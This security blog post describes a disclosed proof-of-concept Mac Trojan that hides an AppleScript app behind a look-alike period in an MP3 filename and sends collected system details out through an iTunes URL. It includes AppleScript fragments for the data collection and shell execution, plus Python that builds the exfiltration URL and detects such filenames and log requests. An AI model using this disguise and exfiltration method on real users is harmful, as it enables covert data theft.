Building OS X Trojans With AppleScript, Homoglyphs and iTunes

Saturday, September 21, 2013

Tripwire Inc


Article by Ken Westin

A recent report states that a Mac-based Trojan attributed to the Syrian Electronic Army (SEA) was discovered. Not much information about the malware has been released, but it should be noted that creating a Trojan for Mac OS X is not particularly difficult.

A year or so ago I stumbled upon a way to create Trojans for OS X using homoglyphs and a bit of social engineering. I disclosed the issue to Apple and presented it at ToorCamp.

I was able to show how it is possible to create a binary that appears to the end user to be a harmless file such as an MP3 or an image.

For my proof of concept I used AppleScript: it is not only an easy way to create a Mac app, it also has hooks into all of the native Mac applications, which makes it easy to drive those applications for malicious purposes.

The proof-of-concept AppleScript application gathers information from the system, runs some shell scripts, and then passes data from the machine through iTunes to a remote server.

Creating the app was one thing; getting someone to click it was another. By default the Finder hides the “.app” extension on Macs, so I wanted to disguise my Trojan as an MP3 and figured I could just rename the file to end in “.mp3”. However, when you do this OS X recognizes the trick and makes the “.app” visible after your “.mp3”, alerting the user that the file is in fact an application and not an MP3.

However, this behavior is only triggered by an actual period. As a workaround I found that if I use a Unicode character that merely looks like a period, OS X leaves the “.app” hidden. A Turkish diacritic, the spacing cedilla (“¸”, U+00B8; not, strictly, an ogonek, which is the different mark “˛” U+02DB), looks close enough to a period to fool most people in the default OS X system font:
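The check a practitioner would want for this trick is the reverse of it: given a directory listing, flag any “.app” bundle whose stem ends in a period look-alike followed by a data extension. The following Python is an added example, not code from the original post or from Apple; the look-alike seed set, the data-extension list and the sample listing are constructed for it, and it generalizes beyond the cedilla to any non-ASCII punctuation, symbol or mark character in that position.

```python
import re
import unicodedata

# Characters that render close enough to "." to pass as an extension separator.
# Constructed seed list for this example; the Unicode confusables table has more.
PERIOD_LOOKALIKES = {
    "\u00b8",  # CEDILLA, the character used in the post
    "\u02db",  # OGONEK
    "\u02d9",  # DOT ABOVE
    "\u2024",  # ONE DOT LEADER
    "\u0701",  # SYRIAC SUPRALINEAR FULL STOP
    "\uff0e",  # FULLWIDTH FULL STOP
    "\u3002",  # IDEOGRAPHIC FULL STOP
}

# Extensions a user expects to open as passive data, not as a program.
DATA_EXTENSIONS = {"mp3", "m4a", "wav", "jpg", "jpeg", "png", "gif",
                   "pdf", "doc", "docx", "xls", "mov", "mp4"}

# Last 2-5 alphanumerics of the stem, plus the single character before them.
_EXT_RE = re.compile(r"(?P<sep>.)(?P<ext>[A-Za-z0-9]{2,5})$")


def classify_bundle_name(name):
    """Return (verdict, detail) for one Finder item name.

    disguised        ".app" bundle whose stem ends in <look-alike><data ext>
    double_extension ".app" bundle whose stem ends in .<data ext>; Finder shows .app
    app              ordinary ".app" bundle
    not_app          not an application bundle at all
    """
    if not name.lower().endswith(".app"):
        return "not_app", None
    stem = name[:-4]
    m = _EXT_RE.search(stem)
    if not m:
        return "app", None
    sep, ext = m.group("sep"), m.group("ext").lower()
    if ext not in DATA_EXTENSIONS:
        return "app", None
    if sep == ".":
        return "double_extension", {"ext": ext}
    # Any non-ASCII punctuation/symbol/modifier/mark character in the separator
    # slot is treated as a look-alike even if it is not in the seed list.
    lookalike = sep in PERIOD_LOOKALIKES or (
        ord(sep) > 0x7F and unicodedata.category(sep) in {"Po", "Sk", "Lm", "Mn", "Pd"}
    )
    if not lookalike:
        return "app", None
    return "disguised", {
        "ext": ext,
        "codepoint": f"U+{ord(sep):04X}",
        "sep_name": unicodedata.name(sep, "UNKNOWN"),
    }


def find_disguised(names):
    """Scan a list of directory entries and return only the disguised bundles."""
    hits = []
    for n in names:
        verdict, detail = classify_bundle_name(n)
        if verdict == "disguised":
            hits.append((n, detail))
    return hits


# Constructed directory listing for the demo; the first and third entries are disguised.
SAMPLE_NAMES = [
    "summer_mix\u00b8mp3.app",   # the post's cedilla trick
    "summer_mix.mp3",            # genuine MP3
    "holiday\uff0ejpg.app",      # fullwidth full stop
    "report.pdf.app",            # real period: Finder shows ".app", the user can see it
    "Safari.app",
    "My Photos.app",
]

if __name__ == "__main__":
    for name, detail in find_disguised(SAMPLE_NAMES):
        print(f"{name!r}: separator {detail['codepoint']} {detail['sep_name']} "
              f"before .{detail['ext']}")
```

Run it against `ls -1 ~/Downloads` output (or `os.listdir`) to sweep a real machine; a double-extension name is reported separately because the Finder already reveals that one, so only the look-alike case is the silent disguise the post describes.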

[Screenshot: OS X filename hack]

I then changed the icon of my application to the standard MP3 icon and the disguise was complete. When the file is double-clicked it opens iTunes and passes it a URL with the collected data encoded in the query string; the remote server logged that data from my semi-willing test victims.

The server then streamed the MP3 they were expecting back through iTunes, so they had no reason to suspect what was happening behind the scenes. Using AppleScript I was able to access pretty much every native OS X application, including iLife and iWork, as well as run shell scripts with whatever permissions the user had:

...
-- trackingURLdata holds the URL built earlier from the collected system info
tell application "iTunes"
	activate
	try
		-- iTunes fetches the URL: the query string carries the data out,
		-- the response streams the MP3 the user expected to hear
		open location trackingURLdata
	end try
end tell

-- runs with the privileges of the user who double-clicked the app
do shell script "{insert shell commands of your choice}"
...

AppleScript’s “system info” command (from the Standard Additions scripting addition) also returns a record with extensive information about the system and the user account, and it is trivial to read:

-- system info already returns a record; the coercion just makes that explicit
set sysinfo to (system info) as record
set uname to long user name of sysinfo   -- e.g. the account's full name
set user to short user name of sysinfo   -- the login name
set cname to computer name of sysinfo    -- the Sharing name of the Mac
set sip to IPv4 address of sysinfo       -- primary interface address

To Apple’s credit, Developer ID and Gatekeeper have been available since Mountain Lion (10.8, and also in the 10.7.5 update to Lion), and they help mitigate this particular attack, but only if Gatekeeper is left enabled:

[Screenshot: OS X Gatekeeper settings]

However, once the Gatekeeper setting was relaxed to allow applications from unidentified developers, the Trojan worked perfectly. Versions of OS X before 10.7.5 do not have Gatekeeper at all and run the Trojan without complaint.

If the file was downloaded from the Internet, a warning may appear telling the user that it was downloaded from the Internet, but I found that most people did not care and simply clicked through without a second thought.

Combining a Mac Trojan with a phishing attack would let the attacker fingerprint the version of OS X the victim is running on the server side (for example from the browser’s User-Agent string) and swap in files tailored to the versions susceptible to the trick.
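The exfiltration channel described above (fields from “system info” packed into the query string of an MP3 URL that iTunes opens, decoded on the server, with the server keying its response on the client’s OS X version) and the detection a defender would run over a web server’s access log, as one added Python example. This is not code from the original post; the field values, the version cut-off at 10.7.5 for Gatekeeper, and the Combined Log Format lines (including the iTunes User-Agent string) are constructed for the example, and no network connection is made.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# The same fields the AppleScript reads from `system info`, plus its
# `system version` property. Constructed sample values for this example.
SAMPLE_SYSINFO = {
    "uname": "Jane Doe",        # long user name
    "user": "jane",             # short user name
    "cname": "janes-macbook",   # computer name
    "sip": "192.168.1.23",      # IPv4 address
    "osv": "10.8.5",            # system version
}


def build_tracking_url(base, sysinfo, track="song.mp3"):
    """Client side: pack the collected fields into the query string of an
    ordinary-looking MP3 URL, the value `open location` hands to iTunes."""
    return f"{base}/{track}?{urlencode(sysinfo)}"


def parse_tracking_request(url):
    """Server side: recover the track name and the fields from the request."""
    parts = urlsplit(url)
    fields = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return parts.path.rsplit("/", 1)[-1], fields


def lacks_gatekeeper(osv):
    """Gatekeeper shipped in OS X 10.7.5 and 10.8; earlier releases run an
    unsigned app without the dialog, which is what a server would key on
    when choosing which file to send back."""
    return tuple(int(x) for x in osv.split(".")) < (10, 7, 5)


# Detection side: a Combined Log Format line whose media request carries
# host-identifying keys in its query string. The agent string is captured
# so an analyst can see the request came from iTunes rather than a browser.
LOG_RE = re.compile(
    r'"GET (?P<path>\S+?\.(?:mp3|m4a))\?(?P<query>\S+) HTTP/1\.[01]" '
    r'(?P<status>\d+) \d+ "[^"]*" "(?P<ua>[^"]*)"'
)
EXFIL_KEYS = {"uname", "user", "cname", "sip"}


def find_exfil_requests(log_lines):
    """Return the media requests whose query string names the client machine."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        q = {k: v[0] for k, v in parse_qs(m.group("query")).items()}
        if EXFIL_KEYS & q.keys():
            hits.append({"path": m.group("path"), "agent": m.group("ua"), "fields": q})
    return hits


# Constructed access-log lines; only the first matches the exfil pattern.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Sep/2013:10:14:22 -0700] "GET /song.mp3?uname=Jane+Doe&user=jane'
    '&cname=janes-macbook&sip=192.168.1.23&osv=10.8.5 HTTP/1.1" 200 4012345 "-" '
    '"iTunes/11.0.5 (Macintosh; OS X 10.8.5)"',
    '10.0.0.9 - - [21/Sep/2013:10:15:01 -0700] "GET /podcast/ep12.mp3?ref=rss HTTP/1.1" '
    '200 9800000 "-" "iTunes/11.0.5 (Macintosh; OS X 10.8.5)"',
    '10.0.0.9 - - [21/Sep/2013:10:15:07 -0700] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    url = build_tracking_url("http://example.invalid", SAMPLE_SYSINFO)
    track, fields = parse_tracking_request(url)
    print(track, fields, "pre-Gatekeeper:", lacks_gatekeeper(fields["osv"]))
    for hit in find_exfil_requests(SAMPLE_LOG):
        print("exfil via", hit["path"], "from", hit["fields"]["cname"], "agent", hit["agent"])
```

The log check is deliberately keyed on the query parameters rather than on iTunes as the client, since legitimate podcast requests (the second sample line) come from the same agent; only the combination of a media path and host-identifying keys is the signal.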

Cross Posted from Tripwire's State of Security

Comment from James Anderson: No doubt that you can't cure stupid. If a person does not care about the alert/warning, then it is a problem. Question: how would you solve the problem of users circumventing a plain warning and an unexpected data file running as an executable?
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.
